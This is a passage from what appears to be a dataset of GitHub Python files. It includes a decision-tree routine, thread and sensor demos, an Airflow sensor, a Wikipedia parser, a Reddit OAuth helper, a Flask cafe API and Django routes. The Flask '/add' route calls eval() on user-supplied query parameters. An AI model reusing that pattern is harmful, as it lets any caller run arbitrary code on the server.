1\n\t\t\t\tcalculations[4, col_index] = -1\n\t\t\telif calculations[0, col_index] == 0 or calculations[1, col_index] == 0:\t\t# pure decision at 1\n\t\t\t\tcalculations[4, col_index] = 0\n\t\t\telse:\n\t\t\t\tp = calculations[0, col_index] / (calculations[0, col_index] + calculations[1, col_index])\n\t\t\t\tn = calculations[1, col_index] / (calculations[0, col_index] + calculations[1, col_index])\n\t\t\t\tcalculations[4, col_index] = -1 * (p * math.log2(p) + n * math.log2(n))\n\n\t\t\t# calc entropy at 0\n\t\t\tif calculations[2, col_index] == 0 and calculations[3, col_index] == 0:\t\t\t# no case with word = 0\n\t\t\t\tcalculations[5, col_index] = -1\n\t\t\telif calculations[2, col_index] == 0 or calculations[3, col_index] == 0:\t\t# pure decision at 0\n\t\t\t\tcalculations[5, col_index] = 0\n\t\t\telse:\n\t\t\t\tp = calculations[2, col_index] / (calculations[2, col_index] + calculations[3, col_index])\n\t\t\t\tn = calculations[3, col_index] / (calculations[2, col_index] + calculations[3, col_index])\n\t\t\t\tcalculations[5, col_index] = -1 * (p * math.log2(p) + n * math.log2(n))\n\n\t\t\t# calc gain\n\t\t\tp1 = (calculations[0, col_index] + calculations[1, col_index]) / (pt + nt)\n\t\t\tp0 = (calculations[2, col_index] + calculations[3, col_index]) / (pt + nt)\n\t\t\tcalculations[6, col_index] = entropy_total - p1 * calculations[4, col_index] - p0 * calculations[5, col_index]\n\n\t# get index of word with max gain\n\tmax_index = np.argmax(calculations[6, :])\n\tdecision = -1\n\t\n\t\n\t\t# probabilities of word with max gain\n\tif calculations[4, max_index] == -1:\t\t\t# no case with word = 1\n\t\tp1 = n1 = -1\n\telse:\n\t\tp1 = calculations[0, max_index] / (calculations[0, max_index] + calculations[1, max_index])\n\t\tn1 = calculations[1, max_index] / (calculations[0, max_index] + calculations[1, max_index])\n\n\tif calculations[5, max_index] == -1:\t\t\t# no case with word = 0\n\t\tp0 = n0 = -1\n\telse:\n\t\tp0 = calculations[2, max_index] / (calculations[2, max_index] + calculations[3, max_index])\n\t\tn0 = calculations[3, max_index] / (calculations[2, max_index] + calculations[3, max_index])\n\n\t# if there is no case where either word = 1 or word = 0\n\tif p1 == -1 or p0 == -1:\n\t\tif pt >= nt:\n\t\t\tdecision = 4\t\t\t\t\t# pos at 1 and pos at 0\n\t\telse:\n\t\t\tdecision = 7\t\t\t\t\t# neg at 1 and neg at 0\n\n\t# if there is only one word\n\telif len(data.columns) == 2:\n\t\tif (p1 >= n1) and (p0 >= n0):\n\t\t\tdecision = 4\t\t\t\t\t# pos at 1 and pos at 0\n\t\telif (p1 >= n1) and (p0 <= n0):\n\t\t\tdecision = 5\t\t\t\t\t# pos at 1 and neg at 0\n\t\telif (p1 <= n1) and (p0 >= n0):\n\t\t\tdecision = 6\t\t\t\t\t# neg at 1 and pos at 0\n\t\telif (p1 <= n1) and (p0 <= n0):\n\t\t\tdecision = 7\t\t\t\t\t# neg at 1 and neg at 0\n\n\t# if there is pure decisions at word == 1 and also at word == 0\n\telif (calculations[4, max_index] == 0) and (calculations[5, max_index] == 0):\n\t\tif (p1 == 1) and (p0 == 1):\n\t\t\tdecision = 4\t\t\t\t\t# pos at 1 and pos at 0\n\t\telif (p1 == 1) and (n0 == 1):\n\t\t\tdecision = 5\t\t\t\t\t# pos at 1 and neg at 0\n\t\telif (n1 == 1) and (p0 == 1):\n\t\t\tdecision = 6\t\t\t\t\t# neg at 1 and pos at 0\n\t\telif (n1 == 1) and (n0 == 1):\n\t\t\tdecision = 7\t\t\t\t\t# neg at 1 and neg at 0\n\n\t# if there is a pure decision at word == 1\n\telif calculations[4, max_index] == 0:\n\t\tif p1 == 1:\n\t\t\tdecision = 0\t\t\t\t\t# pos at 1\n\t\telse:\n\t\t\tdecision = 1\t\t\t\t\t# neg at 1\n\n\t# if there is a pure decision at word == 0\n\telif calculations[5, max_index] == 0:\n\t\tif p0 == 1:\n\t\t\tdecision = 2\t\t\t\t\t# pos at 0\n\t\telse:\n\t\t\tdecision = 3\t\t\t\t\t# neg at 0\n\n\treturn max_index, decision\n","repo_name":"JohnEssam235/Data-St-project","sub_path":"get_decision.py","file_name":"get_decision.py","file_ext":"py","file_size_in_byte":4710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3620106869","text":"import threading \nimport random\nimport time\nimport queue\n\n\nqueue = queue.Queue(10)\n\ndef Producer():\n while True:\n item = random.randint(1, 100)\n print(f\"Produced : {item}\")\n queue.put(item)\n time.sleep(random.random())\n\n\ndef Consumer():\n while True:\n num = queue.get()\n queue.task_done()\n print(f\"Consumed : {num}\")\n time.sleep(random.randint(2, 5))\n\nt1 = threading.Thread(target=Producer)\nt2 = threading.Thread(target=Consumer)\n\n\nt1.start()\nt2.start()\n\nt1.join()\nt2.join()\nqueue.join()","repo_name":"subhashishnabajja/college-code","sub_path":"sy/sem-3/operating-systems/practical-1/practical-1B/producer-consumer-message-passing.py","file_name":"producer-consumer-message-passing.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"27297416933","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport time\nimport numpy as np\n\n# import module controlling readout device\nfrom phypidaq.ADXL345Config import *\n\n# create an instance of the device\ndevice = ADXL345Config()\n\n# Initialize the device\ndevice.init()\n\n# reserve space for data (four channels here)\ndata = np.array([0., 0., 0.])\n\nprint('Starting readout. Type to stop')\n\n# read-out interval in s\ndt = 1.0\n# start time\nT0 = time.time()\n\n# Readout loop, stop with +C\nwhile True:\n device.acquireData(data)\n dT = time.time() - T0\n print('%.2g, %.2gm/s² %.2gm/s² %.2gm/s²' % (dT, data[0], data[1], data[2]))\n time.sleep(dt)\n","repo_name":"PhyPiDAQ/PhyPiDAQ","sub_path":"examples/read_ADXL345.py","file_name":"read_ADXL345.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"37984942950","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Any\n\nfrom airflow.exceptions import AirflowException\nfrom airflow.sensors.base import BaseSensorOperator\n\nfrom sample_provider.hooks.sample import SampleHook\n\nif TYPE_CHECKING:\n from airflow.utils.context import Context\n\n\nclass SampleSensor(BaseSensorOperator):\n \"\"\"\n Executes a HTTP GET statement and returns False on failure caused by 404 Not Found.\n\n :param sample_conn_id: The connection to run the sensor against\n :type sample_conn_id: str\n :param method: The HTTP request method to use\n :type method: str\n :param endpoint: The relative part of the full url\n :type endpoint: str\n :param request_params: The parameters to be added to the GET url\n :type request_params: a dictionary of string key/value pairs\n :param headers: The HTTP headers to be added to the GET request\n :type headers: a dictionary of string key/value pairs\n \"\"\"\n\n # Specify the arguments that are allowed to parse with jinja templating\n template_fields = [\n \"endpoint\",\n \"request_params\",\n \"headers\",\n ]\n\n def __init__(\n self,\n *,\n endpoint: str,\n sample_conn_id: str = SampleHook.default_conn_name,\n method: str = \"GET\",\n request_params: dict[str, Any] | None = None,\n headers: dict[str, Any] | None = None,\n **kwargs,\n ) -> None:\n super().__init__(**kwargs)\n self.endpoint = endpoint\n self.sample_conn_id = sample_conn_id\n self.request_params = request_params or {}\n self.headers = headers or {}\n\n self.hook = SampleHook(method=method, sample_conn_id=sample_conn_id)\n\n def poke(self, context: Context) -> bool:\n self.log.info(\"Poking: %s\", self.endpoint)\n try:\n response = self.hook.run(\n self.endpoint,\n data=self.request_params,\n headers=self.headers,\n )\n if response.status_code == 404:\n return False\n\n except AirflowException as exc:\n if str(exc).startswith(\"404\"):\n return False\n\n raise exc\n\n return True\n","repo_name":"astronomer/airflow-provider-sample","sub_path":"sample_provider/sensors/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"68"} +{"seq_id":"23726415155","text":"import sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom main_project import Ui_MainWindow\nfrom ISIMM import ISIMM\nfrom os import environ\n\ndef suppress_qt_warnings():\n environ[\"QT_DEVICE_PIXEL_RATIO\"] = \"0\"\n environ[\"QT_AUTO_SCREEN_SCALE_FACTOR\"] = \"1\"\n environ[\"QT_SCREEN_SCALE_FACTORS\"] = \"1\"\n environ[\"QT_SCALE_FACTOR\"] = \"1\"\n \nif __name__ == \"__main__\":\n suppress_qt_warnings()\n\nclass main:\n def __init__(self):\n self.inst = ISIMM()\n self.fen = QtWidgets.QMainWindow()\n self.ui = Ui_MainWindow(self.inst)\n self.ui.setupUi(self.fen)\n self.fen.show()\n\napp = QtWidgets.QApplication(sys.argv)\nwindow=main()\napp.exec()","repo_name":"MazenSghaier/student-management","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36364029721","text":"def main():\n part_1()\n part_2()\n\n\ndef part_1():\n inp = get_input('./inputs/02_actual.txt')\n\n total = 0\n\n for line in inp:\n line = line.strip()\n game_id, cubes = line.split(': ')\n possible = check_possibility(cubes)\n\n if possible:\n game_id = int(game_id.lstrip('Game '))\n total += game_id\n\n print('Part 1:', total)\n\n\ndef part_2():\n inp = get_input('./inputs/02_actual.txt')\n\n total = 0\n\n for line in inp:\n line = line.strip()\n game_id, cubes = line.split(': ')\n\n red = 0\n blue = 0\n green = 0\n\n sets = cubes.split(';')\n for s in sets:\n pairs = s.strip().split(', ')\n for pair in pairs:\n amount, color = pair.split(' ')\n if color == 'red' and int(amount) > red:\n red = int(amount)\n elif color == 'green' and int(amount) > green:\n green = int(amount)\n elif color == 'blue' and int(amount) > blue:\n blue = int(amount)\n total += (red * green * blue)\n\n print('Part 2:', total)\n\n\ndef check_possibility(cubes: []) -> bool:\n \"\"\" A game is only playable when there are no more than 12 red, 13 green and 14 blue cube for each set\n\n :param cubes: List with all sets of a game\n :return: True if the game is playable\n \"\"\"\n sets = cubes.split(';')\n for s in sets:\n pairs = s.strip().split(', ')\n for pair in pairs:\n amount, color = pair.split(' ')\n if (color == 'red' and int(amount) > 12 or\n color == 'green' and int(amount) > 13 or\n color == 'blue' and int(amount) > 14):\n return False\n return True\n\n\ndef get_input(file_path):\n with open(file_path) as f:\n return f.readlines()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SimonHRD/advent-of-code","sub_path":"2023/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31985468352","text":"from aiogram.types import CallbackQuery, Message, ParseMode\nfrom aiogram.dispatcher import FSMContext\n\nfrom bot import dp, bot\nfrom state import FormState, FormItem\nfrom components.catalogueList import updateStateDataList, catalogueList\nfrom utils.validateYear import validateYear\nfrom constants import CONFIRM_BUTTON_CALLBACK_QUERY_TYPE, \\\n CONFIRM_BUTTON_CALLBACK_BRAND_DATA, CONFIRM_BUTTON_CALLBACK_PRICE_DATA\nfrom utils.fetch import fetch\n\n# confirm button filters\nnoConfirmButton = lambda callback: not CONFIRM_BUTTON_CALLBACK_QUERY_TYPE in callback.data\nisConfirmButton = lambda callback: CONFIRM_BUTTON_CALLBACK_QUERY_TYPE in callback.data\n\n@dp.callback_query_handler(noConfirmButton, state = FormState.withBrands)\nasync def selectBrand(callback: CallbackQuery, state: FSMContext):\n currentState = await state.get_data()\n updatedList = updateStateDataList(currentState['brands'], callback.data)\n await state.update_data(brands = updatedList)\n\n return updatedList, CONFIRM_BUTTON_CALLBACK_BRAND_DATA\n\n@dp.callback_query_handler(isConfirmButton, state = FormState.withBrands)\nasync def confirmBrand(callback: CallbackQuery, state: FSMContext):\n await FormState.withYears.set()\n await callback.bot.send_message(\n text = 'Введiть дату першoї реєстрацiї авто🚐.\\nНаприклад, точну 2007 або перiод 2001-2009.',\n chat_id = callback.message.chat.id,\n parse_mode = ParseMode.HTML\n )\n\n return None # cancel post middleware\n\n@dp.message_handler(state = FormState.withYears)\nasync def selectYears(message: Message, state: FSMContext):\n messageText = message.text\n validateResult = validateYear(messageText)\n\n if bool(validateResult):\n await state.update_data(years = validateResult)\n await FormState.withPrice.set()\n priceList: list = fetch('api/params/price')\n\n mapedPriceList = list(map(lambda price: FormItem(price), priceList))\n\n await state.update_data(price = mapedPriceList)\n await message.answer(\n 'Оберiть цiновий дiапазон (в долларах США)💵',\n reply_markup = catalogueList(mapedPriceList, CONFIRM_BUTTON_CALLBACK_PRICE_DATA),\n parse_mode = ParseMode.HTML\n )\n else:\n await message.answer(\n text ='Здається, що Ви ввели невiрну дату🤕.\\nКорректний формат має бути точний рiк (наприклад, 2007) або перiод (2001-2007)🧐',\n parse_mode = ParseMode.HTML\n )\n\n@dp.callback_query_handler(noConfirmButton, state = FormState.withPrice)\nasync def selectPrice(callback: CallbackQuery, state: FSMContext):\n currentState = await state.get_data()\n updatedList = updateStateDataList(currentState['price'], callback.data)\n await state.update_data(price = updatedList)\n\n return updatedList, CONFIRM_BUTTON_CALLBACK_PRICE_DATA\n\n@dp.callback_query_handler(isConfirmButton, state = FormState.withPrice)\nasync def confirmPrice(callback: CallbackQuery, state: FSMContext):\n await FormState.withPrice.set()\n await callback.bot.send_message(\n text = 'ПОКА ШО ВСЁ..',\n chat_id = callback.message.chat.id,\n parse_mode = ParseMode.HTML\n )\n\n return None # cancel post middleware\n","repo_name":"bringmetheaugust/Challenger","sub_path":"telegram_bot/src/handlers/updateForm.py","file_name":"updateForm.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"649330121","text":"import re\nfrom bs4 import BeautifulSoup\nfrom collections import defaultdict, deque, OrderedDict\nimport os\n\n\n\"\"\"\n start: Stone_Age\n end: Python_(programming_language)\n chain: start -> Brain -> Artificial_intelligence -> end\n \n FIND:
\n - Количество картинок (img) с шириной (width) не меньше 200. Например: End или
Contents
\n \n - Длину максимальной последовательности ссылок, между которыми нет других тегов, открывающихся или закрывающихся.\n Например:

, ,

- тут 2 ссылки подряд, т.к. закрывающийся span прерывает\n последовательность.

, ,

- а тут 3 ссылки подяд, т.к. span находится \n внутри ссылки, а не между ссылками.\n \n - Количество списков (ul, ol), не вложенных в другие списки. Например:
, \n
- два не вложенных списка (и один вложенный) \n \n path: /Users/macair/Python Projects/CourseraP3/wiki\n \n result:\n return {\n 'Stone_Age': [13, 10, 12, 40],\n 'Brain': [19, 5, 25, 11],\n 'Artificial_intelligence': [8, 19, 13, 198],\n 'Python_(programming_language)': [2, 5, 17, 41]\n } \n\"\"\"\n\n\ndef bfs(start, end, tree):\n visited, queue = defaultdict(list), deque([start])\n visited[start]\n while queue:\n vertex = queue.popleft()\n for neighbour in tree.get(vertex, set()):\n if neighbour == end:\n visited[neighbour].append(vertex)\n queue.clear()\n break\n\n elif neighbour not in visited:\n visited[neighbour].append(vertex)\n queue.append(neighbour)\n\n if len(tree) == len(visited):\n return visited\n return bfs(end, start, visited)\n\n\ndef build_tree(start, end, path):\n link_re = re.compile(r\"(?<=/wiki/)[\\w()]+\")\n files = OrderedDict.fromkeys(os.listdir(path))\n for file in files.keys():\n with open(os.path.join(path, file), \"r\") as f:\n files[file] = set(link_re.findall(f.read()))\n return bfs(start, end, files)\n\n\ndef build_bridge(start, end, path):\n return build_tree(start, end, path).keys()\n\n\ndef parse(start, end, path):\n\n def find_link_chain(soup, name):\n \"\"\"\n :param soup:\n :return: max_chain[0]\n max chain of links with tag \n \"\"\"\n li = soup.find(name)\n chain = [li, ] if li else []\n max_chain = []\n while li:\n nli = li.findNextSibling()\n if nli:\n li = nli\n if nli.name == name:\n chain.append(li)\n else:\n if len(max_chain) > 1:\n max_chain = [max(max_chain, key=len), ]\n\n max_chain.append(chain)\n chain = []\n else:\n li = li.find_next(name)\n max_chain.append(chain)\n chain = [li, ]\n\n return max_chain[0]\n\n bridge = build_bridge(start, end, path)\n results = OrderedDict.fromkeys(bridge)\n\n for file in bridge:\n with open(os.path.join(path, file), \"r\") as data:\n soup = BeautifulSoup(data, \"html.parser\")\n body = soup.find(id=\"bodyContent\")\n\n imgs = len(body.find_all(\"img\", width=lambda x: int(x or 0) >= 200))\n headers = len(re.findall(r\"([CET].+?)<\\/\", str(body)))\n links = len(find_link_chain(body, name=\"a\"))\n lists = len([tag for tag in body.find_all([\"ul\", \"ol\"]) if not tag.find_parents([\"ul\", \"ol\"])])\n\n results[file] = [imgs, headers, links, lists]\n\n return results\n","repo_name":"heorhii-bolotov/Python-Projects","sub_path":"CourseraP3/W2T1.py","file_name":"W2T1.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23999154132","text":"#!/usr/bin/env python\n\n\"\"\"This example demonstrates the flow for retrieving a refresh token.\n\nIn order for this example to work your application's redirect URI must be set\nto http://localhost:8080.\n\nThis tool can be used to conveniently create refresh tokens for later use with\nyour web application OAuth2 credentials.\n\n\"\"\"\nimport logging\nimport random\nimport socket\nimport sys\nimport conf\nimport webbrowser\nimport praw\n\nhandler = logging.StreamHandler()\nhandler.setLevel(logging.DEBUG)\nlogger = logging.getLogger('retroreddit-creator')\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(handler)\n\n\ndef receive_connection():\n \"\"\"Wait for and then return a connected socket..\n\n Opens a TCP connection on port 8080, and waits for a single client.\n\n \"\"\"\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server.bind(('localhost', 8080))\n server.listen(1)\n client = server.accept()[0]\n server.close()\n return client\n\n\ndef send_message(client, message):\n \"\"\"Send message to client and close the connection.\"\"\"\n print(message)\n client.send('HTTP/1.1 200 OK\\r\\n\\r\\n{}'.format(message).encode('utf-8'))\n client.close()\n\n\ndef request_login(reddit):\n \"\"\"Provide the program's entry point when directly executed.\"\"\"\n scopes = ['edit', 'history', 'identity',\n 'mysubreddits', 'privatemessages', 'read', 'report',\n 'save', 'submit', 'subscribe', 'vote']\n # scopes = ['creddits', 'edit', 'flair', 'history', 'identity',\n # 'modconfig', 'modcontributors', 'modflair', 'modlog',\n # 'modothers', 'modposts', 'modself', 'modwiki',\n # 'mysubreddits', 'privatemessages', 'read', 'report',\n # 'save', 'submit', 'subscribe', 'vote', 'wikiedit',\n # 'wikiread']\n\n state = str(random.randint(0, 65000))\n url = reddit.auth.url(scopes, state, 'permanent')\n webbrowser.open(url)\n sys.stdout.flush()\n\n client = receive_connection()\n data = client.recv(1024).decode('utf-8')\n param_tokens = data.split(' ', 2)[1].split('?', 1)[1].split('&')\n params = {key: value for (key, value) in [token.split('=')\n for token in param_tokens]}\n\n if state != params['state']:\n send_message(client, 'State mismatch. Expected: {} Received: {}'\n .format(state, params['state']))\n return None\n elif 'error' in params:\n send_message(client, params['error'])\n return None\n\n refresh_token = reddit.auth.authorize(params['code'])\n send_message(client, 'Refresh token: {}; please close this window'.format(refresh_token))\n return refresh_token\n\n\ndef create_reddit(refresh_token=None):\n if isinstance(refresh_token, str) and refresh_token:\n reddit = praw.Reddit(client_id=conf.clientId,\n client_secret=conf.clientSecret,\n user_agent=conf.userAgent,\n redirect_uri='http://localhost:8080',\n refresh_token=refresh_token)\n reddit.config.decode_html_entities = False\n reddit.read_only = False\n return reddit\n reddit = praw.Reddit(client_id=conf.clientId,\n client_secret=conf.clientSecret,\n redirect_uri='http://localhost:8080',\n user_agent=conf.userAgent)\n reddit.config.decode_html_entities = False\n return reddit\n\n\ndef init_reddit():\n try:\n with open(\"retro_reddit.txt\", \"r+\") as token_file:\n token = token_file.readline()\n logger.debug(\"Init with token {}\".format(token))\n if token:\n return create_reddit(token)\n except FileNotFoundError:\n pass\n return create_reddit()\n\n\ndef save_token(refresh_token):\n with open(\"retro_reddit.txt\", \"w+\") as token_file:\n token_file.write(refresh_token)\n token_file.flush()\n\n\ndef login(reddit, refresh_token=None):\n if isinstance(refresh_token, str) and refresh_token:\n logger.debug(\"Found token {}\".format(refresh_token))\n save_token(refresh_token)\n return create_reddit(refresh_token)\n logger.debug(\"Launching login request\")\n token = request_login(reddit)\n if token is not None:\n save_token(token)\n return create_reddit(token)\n return reddit\n\n","repo_name":"McHacks-2018/Retro-Reddit","sub_path":"reddit_creator.py","file_name":"reddit_creator.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2582928954","text":"# Given a non-empty array of integers nums, every element appears twice except for one. Find that single one.\n# You must implement a solution with a linear runtime complexity and use only constant extra space.\n\nnums = [2,2,1,5,1]\n\n\ndef singleNumber(nums):\n singleNum = None\n length = len(nums) # get length\n i = 0\n while i < length: # while i is in range\n if nums.count(nums[i]) == 1: # if the number is only found once\n singleNum = nums[i] # assign single value to variable\n break #leave loop\n i += 1\n return singleNum # return single value\n\n \nprint(singleNumber(nums))\n\n","repo_name":"E-Justin/exercises-","sub_path":"findSingleValue.py","file_name":"findSingleValue.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1850027756","text":"from flask import Flask, jsonify, render_template, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom random import randint\n\napp = Flask(__name__)\n\n##Connect to Database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///cafes.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\n##Cafe TABLE Configuration\nclass Cafe(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), unique=True, nullable=False)\n map_url = db.Column(db.String(500), nullable=False)\n img_url = db.Column(db.String(500), nullable=False)\n location = db.Column(db.String(250), nullable=False)\n seats = db.Column(db.String(250), nullable=False)\n has_toilet = db.Column(db.Boolean, nullable=False)\n has_wifi = db.Column(db.Boolean, nullable=False)\n has_sockets = db.Column(db.Boolean, nullable=False)\n can_take_calls = db.Column(db.Boolean, nullable=False)\n coffee_price = db.Column(db.String(250), nullable=True)\n\n def list_cafes(self):\n return {column.name: getattr(self, column.name) for column in self.__table__.columns}\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n\n@app.route(\"/random\", methods=[\"GET\"])\ndef get_random_cafe():\n with app.app_context():\n no_of_rows = db.session.query(Cafe).count()\n random_id = randint(1, no_of_rows + 1)\n random_cafe = db.session.query(Cafe).filter(Cafe.id == random_id).scalar()\n output = {\"cafe\": {\n \"can_take_calls\": random_cafe.can_take_calls,\n \"coffee_price\": random_cafe.coffee_price,\n \"has_socket\": random_cafe.has_sockets,\n \"has_toilet\": random_cafe.has_toilet,\n \"has_wifi\": random_cafe.has_wifi,\n \"id\": random_cafe.id,\n \"img_url\": random_cafe.img_url,\n \"location\": random_cafe.location,\n \"map_url\": random_cafe.map_url,\n \"name\": random_cafe.name,\n \"seats\": random_cafe.seats\n }}\n return jsonify(output)\n\n\n@app.route(\"/all\", methods=[\"GET\"])\ndef get_all_cafes():\n cafe_list = []\n with app.app_context():\n all_cafes = db.session.query(Cafe).all()\n for cafe in all_cafes:\n cafe_list.append(cafe.list_cafes())\n output = {\"cafes\": cafe_list}\n return jsonify(output)\n\n\n@app.route(\"/search\", methods=[\"GET\"])\ndef get_caffe_by_loc():\n cafe_list = []\n area = request.args.get(\"loc\")\n with app.app_context():\n area_caffe = db.session.query(Cafe).filter(Cafe.location == area).all()\n if len(area_caffe) == 0:\n output = {\n \"error\": {\n \"Not Found\": f\"Sorry, we don´t have cafe at {area} location.\"\n }\n }\n else:\n for cafe in area_caffe:\n cafe_list.append(cafe.list_cafes())\n output = {\"cafes\": cafe_list}\n return jsonify(output)\n\n\n@app.route(\"/add\", methods=[\"GET\"])\ndef add_cafe():\n name = request.args.get(\"name\")\n map_url = request.args.get(\"map_url\")\n img_url = request.args.get(\"img_url\")\n location = request.args.get(\"location\")\n seats = request.args.get(\"seats\")\n has_toilet = request.args.get(\"has_toilet\")\n has_wifi = request.args.get(\"has_wifi\")\n has_sockets = request.args.get(\"has_sockets\")\n can_take_calls = request.args.get(\"can_take_calls\")\n coffee_price = request.args.get(\"coffee_price\")\n\n new_cafe = Cafe(\n name=name,\n map_url=map_url,\n img_url=img_url,\n location=location,\n seats=seats,\n has_toilet=eval(has_toilet),\n has_wifi=eval(has_wifi),\n has_sockets=eval(has_sockets),\n can_take_calls=eval(can_take_calls),\n coffee_price=coffee_price\n )\n with app.app_context():\n db.session.add(new_cafe)\n db.session.commit()\n\n response = {\n \"response\": {\n \"success\": \"Succesfully added the new cafe.\"\n }\n }\n return jsonify(response)\n\n\n## HTTP GET - Read Record\n\n## HTTP POST - Create Record\n\n## HTTP PUT/PATCH - Update Record\n\n## HTTP DELETE - Delete Record\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"womaro/day-66-api-with-RESTful-routing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33399730415","text":"def solution(board, moves):\n answer = 0\n\n basket = list()\n\n for m in moves:\n\n for idx in range(len(board)):\n\n if board[idx][m - 1] > 0:\n basket.append(board[idx][m - 1])\n board[idx][m - 1] = 0\n\n if basket[-1:] == basket[-2:-1]:\n answer += 2\n basket = basket[:-2]\n break\n return answer\n\nprint(solution([[0,0,0,0,0],[1,1,1,1,1],[2,2,2,2,2],[3,3,4,3,3],[3,5,1,3,1]],[1,5,3,5,1,2,1,4]))\n\n'''\n배열에 초기값이 있을지 없을지 모르는 상황에서 list[-2] 처럼 확실한 index를 지정하지말고,\nlist[-2:-1] 처럼 범위로 지정하면, 값이 없을때는 빈 배열로 나오게된다.\n이것으로 index out of range 오류를 피해갈수있음\n\n'''","repo_name":"steampower33/Algorithm_Solve","sub_path":"python_solve/Lv1/크레인 인형뽑기 게임.py","file_name":"크레인 인형뽑기 게임.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37885870375","text":"\"\"\"fighter URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom django.conf.urls import url\nfrom rest_framework import routers\nfrom contest.views import (\n general_views,\n entry_views,\n event_views,\n user_views,\n chat_views,\n social_views,\n game_views,\n faq_views\n)\nfrom rest_framework_extensions.routers import ExtendedSimpleRouter\nfrom rest_framework.routers import DefaultRouter\nfrom rest_framework_jwt.views import obtain_jwt_token, refresh_jwt_token, verify_jwt_token\n\nrouter = ExtendedSimpleRouter()\nevent_router = router.register(r'events', event_views.EventViewSet)\nevent_router.register(\n r'bouts',\n general_views.BoutViewSet,\n basename='events-bout',\n parents_query_lookups=['event']\n )\n\nrouter.register(r'^fighters', general_views.FighterViewSet)\nrouter.register(r'^entries', entry_views.EntryViewSet)\nrouter.register(r'^games', game_views.GameViewSet)\nrouter.register(r'^users', user_views.UserViewSet)\nrouter.register(r'^groups', general_views.GroupViewSet)\nrouter.register(r'^faqs', faq_views.FaqViewSet)\n\n# chat\nrouter.register(r'^chat/rooms', chat_views.ChatRoomViewSet)\nrouter.register(r'^chat/rooms/(?P\\d+)$', chat_views.ChatRoomViewSet)\nrouter.register(r'^chat/files', chat_views.ChatFileViewSet)\nrouter.register(r'^chat/messages', chat_views.ChatMessageViewSet)\nrouter.register(r'^chat/messages/(?P\\d+)$', chat_views.ChatMessageViewSet)\n\n# customize admin\n# class CustomAdminSite(admin.AdminSite):\n \n# def get_urls(self):\n# urls = super(CustomAdminSite, self).get_urls()\n# custom_urls = [\n# url(r'desired/path$', self.admin_view(organization_admin.preview), name=\"preview\"),\n# ]\n# return urls + custom_urls\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/', include(router.urls)),\n url(r'^auth/', include('rest_auth.urls')),\n url(r'^auth/registration/', include('rest_auth.registration.urls')),\n url(r'^auth/twitter/$', social_views.TwitterLogin.as_view(), name='twitter_login'),\n url(r'^auth/twitter/request_token/$', social_views.TwitterAuthRedirectEndpoint.as_view()),\n url(r'^auth/twitter/callback/$', social_views.TwitterCallbackEndpoint.as_view()),\n url(r'^auth/twitter/webhook/$', social_views.TwitterWebhookEndpoint.as_view()),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n]\n","repo_name":"aalacy/mma-website","sub_path":"fighter/fighter/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26977651315","text":"from mrjob.job import MRJob\r\nfrom mrjob.step import MRStep\r\n\r\nclass MRMostUsedWord(MRJob):\r\n\r\n def steps(self):\r\n return [\r\n MRStep(mapper=self.mapper_get_friends,\r\n reducer=self.reducer_count_friends),\r\n MRStep(mapper=self.mapper_socialrank,\r\n reducer=self.reducer_socialrank)\r\n 